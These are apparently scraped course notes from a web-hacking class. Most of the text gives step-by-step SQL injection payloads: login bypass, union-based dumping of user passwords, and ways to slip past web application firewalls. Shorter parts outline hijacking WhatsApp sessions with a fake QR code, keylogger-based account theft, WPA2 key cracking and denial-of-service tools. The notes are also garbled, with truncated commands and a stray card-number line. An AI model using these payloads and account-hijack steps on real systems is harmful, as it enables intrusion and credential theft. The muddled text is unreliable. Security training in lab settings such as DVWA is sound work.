You are on page 1of 6

Day 2

Web Application Hacking and Security
Website: Collecetion of pages is known as website.

Types of Websites

Static : A Website will have no database inside it hence user can see the content
of the website but can not input anything from users's side.

For Example: Pure HTML Site.

Dynamic : These websites carry database with in hence it has lots of user
interaction area's from where user eneters information/data which goes and save in
the backend.

For Example: facebook,google,twitter,ums etc

OWASP TOP 10 Attacks

O : Open
W : web
A : Application
S : Security
P : Project

SQL Injection
SQL : Structured Query Language

DDL : Data Definition Lanaguage

DML : Data Manupulation Lang.

DCL : Data Control Lang.

Attack 1: Authentication Bypass Attack

When a hacker tries to bypass the login panel of the website and gain access of the
admin panel with all features through which he/she can manupulate the website

Target :

userid=osama admin
password=bomb admin

select * from userstable where userid='osama''or'1'='1 and password='bomb''or'1'='1


Union Based Injection


D : Damn
V : Vulnerable
W : Web
A : Application

Download :

1. XAMPP Server (To make your computer as server)
X : Cross Platform
A : Apache
P : Perl

2. DVWA :Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn
vulnerable. Its main goals are to be an aid for security professionals to test
their skills and tools in a legal environment, help web developers better
understand the processes of securing web applications and aid teachers/students to
teach/learn web application security in a class room environment.

3. Copy and paste downloaded files in c:/xampp/htdoc folder


Step 1: Target

Step 2: Find any GET method in the URL of the website


Step 3: Check the exception handling'&Submit=Submit#

Step 4: Total number of columns from the respective table where id is a column.' order by 1--

Step 5: Dump the left 2 columns on the right hand side.' union select 1,2--
Step 6: Get the database and version name
Database->Tables->Columns->Data' union select

Step 7: Get the entire tables of the webiste from the database.
Schema: Database ki MAA.
Tables :information_schema.tables

Columns:information_schema.columns' union select 1,table_name

from information_schema.tables--+&Submit=Submit#

Target Table Found : users

Step 8 : Get the columns of the users table' union select 1,column_name
from information_schema.columns where table_name='users'--+&Submit=Submit#

Step 9 : Get the data from user and password columns' union select user,password
from users--+&Submit=Submit#

Bypassing Firewall aka Union Based Injection via Web Application Firewall

Step 1: FInd GET method in the URL

Step 2: Check the exception hanlding'

Step 3: Count the total number of columns order by 3--+

Step 4: Dump the columns on the right handside. union select 1,2--+

Bypassing Technique 1:
Upper Lower Case
union select
UnIoN sElEcT -> new payload UnIoN sElEcT 1,2--+

Bypassing Technique II:Inline Comments

Executable inline comments

/*!UnIoN*/ /*!SeLeCt*/ /*!UnIoN*/ /*!SeLeCt*/ 1,2--+

Bypassing technique 3: Version Based Inline Executable Comments /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2--+

1.00.00 : 10000
2.00.00 :20000
5.00.00 : 50000

STep 5: Get the database /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,database()--+

Step 6: Get the tables of the database /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,/*!table_name*/
/*!from*/ /*!information_schema.tables*/--+

Target Table : users

Step 7: Get the columns /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,/*!
50000GrOuP_cOnCaT(column_name)*/ /*!50000from*/ /*!
50000information_schema.columns*/ /*!50000where*/ /*!50000table_name='users'*/--+

Step 8: Get the login and password /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,password from

1. Do not run waf with default security settings
2. Keep update on new blacklisted parameters for waf
3. Make sure you do the custom changes in the WAF as per attack you are getting
4. Never off the firewall interms of fast response expectation in traffic.
5. have good validation of received queries and inputs at server level also.

Whatsapp Hacking Attack : QRLJACKING

Step 1: Download Kali Linux (2.99GB)
How to Install and RUn : Watch:

Step 2: Run and fill the username and password

username: root
password: toor

Step 3: Download QRLjacking code from Github

Open Terminal: git clone

Step 4: Open QRLframework folder

Step 5: give permissions to
chmod +x
Step 6: Run it in terminal ./
Step 7: Select Chat Application -> Whatsapp -> Select Port 1337

Step 4: To make this fake whatsapp QR code LIVE on internet.

Download a service AKA: ngrok
Facebook | Email Hacking Methods
Family Keylogger :

How to Secure your Email Accounts

1. Always use a pass phrase instead of a password.
2. Always use a robust password
Card no Expiry Date and CVV : Check


3. *&Ig3SimG&*
4. Active 2 Step Verification in your Gmail.
5. Facebook: Backupcodes
6. Always check ur login activites from Gmail to see any unauthorised access.

Reverse Engineering | Cracking LIVE

Reverse Engineering

Engineering : The goal of eng. is to build something.

High Level : ENG : C C++ Java Python

Middle Level : Assembly : .obj

Low Level : Binary : .exe

1. OllyDBG
2. Perfect Keylogger
3. Windows Platform

Target :

Wifi Hacking
Wifi Hacking: Wifi Stands for wireless fidelity. It works on protocol 802.11a
onwards. Goal is to provide a wireless connectivty between hosts for data and
information transfer and establish a valid communication channel for the same.

Types of KEY Security Encryptions

1. WEP : 64bit
2. WPA : 128bit
3. WPA-2 PSK <--- Target 256 and above

Problem : You cannot brute force the kEY.

How to Crack then : Dictionary Based Attack

1. Kali Linux 1.8 version (old)
2. airmon-ng : This application is a CLI based used to put your wifi device inot
monitoring mode and check if its capable of proceeding with the attack.
3. airodump-ng : This application will help you to dump the air packets and
identofy that how many wifi access points are there near by you so that you can
select the target to test its security.
4.macchanger*: This helps you to spoof your wifi adpaters real identity with fake
mac address in case you want to do anonymous security testing.
5. aircrack-ng : This application will help you to crack the key which you
extracted while wifi hacking process and will help you to match with the dictionary
and if found will show the key.

rahul -->!@#$% --> Mobile

Router:rahul->!@#$% <---- !@#$%---rahul

Network Attacks : Exploitation

Active Attack : This attack is mainly concerned with the device direct
attack.Hence we get the IP of teh device and then attack on the IP directly, the
main goal of this attack is either to gain access to that device or if failed then
down the host.

Example: Router DDOS Attack, DHCP Starvation Attack with Yersinia and websploit
wifi jammer

*Requirement : websploit in Kali Linux

Step 1: Open terminal and type websploit

Step 2: To see the cli network attacks type show modules

Source Tute:

Source Article: